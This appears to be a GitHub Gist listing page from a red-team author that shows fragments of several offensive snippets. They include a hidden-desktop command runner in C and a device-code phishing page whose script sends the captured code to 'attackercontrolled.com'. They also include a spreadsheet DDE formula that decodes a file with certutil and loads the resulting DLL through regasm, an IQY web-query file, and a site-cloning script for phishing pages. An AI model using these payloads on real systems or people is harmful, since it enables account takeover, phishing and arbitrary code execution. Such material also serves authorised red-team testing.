I hereby claim:
- I am Mr-Un1k0d3r on github.
- I am mrun1k0d3r (https://keybase.io/mrun1k0d3r) on keybase.
- I have a public key whose fingerprint is B6EC B08B 2E02 722D 719E F173 83C5 5463 945D 2EA6
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: | |
| # ./generate.sh file.o | |
| # \x0f\x01\x.. | |
| # ./generate.sh file.o ,0x | |
| # ,0x0f,0x01,0x.. | |
| #!/bin/bash | |
| DELIMITER=$2 | |
| if [ -z "$DELIMITER" ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // To compile: gcc64.exe run.c -o run.exe | |
| // To run: run.exe cmd.exe "/c whoami" | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| int main(int argc, char **argv) { | |
| CHAR cDesktop[] = "hiddendesktop"; | |
| HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- This page can be formatted to look like something more interesting --> | |
| <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
| <script> | |
| $.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
| $.get("https://attackercontrolled.com/?id=" + data.device_code); | |
| document.write(data.message); | |
| }); | |
| </script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| WEB | |
| 1 | |
| https://ringzer0team.com/IQY | |
| Selection=EntirePage | |
| Formatting=RTF | |
| PreFormattedTextToColumns=True | |
| ConsecutiveDelimitersAsOne=True | |
| SingleBlockTextImport=False | |
| DisableDateRecognition=False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Cloning $1" | |
| wget $1 -O index.html &> /dev/null | |
| TAG="<base href=\"$1\"/></head>" | |
| sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null | |
| echo "index.html was saved and modified" |
Mr-Un1k0d3r
/ keybase.md
Last active
August 9, 2016 20:24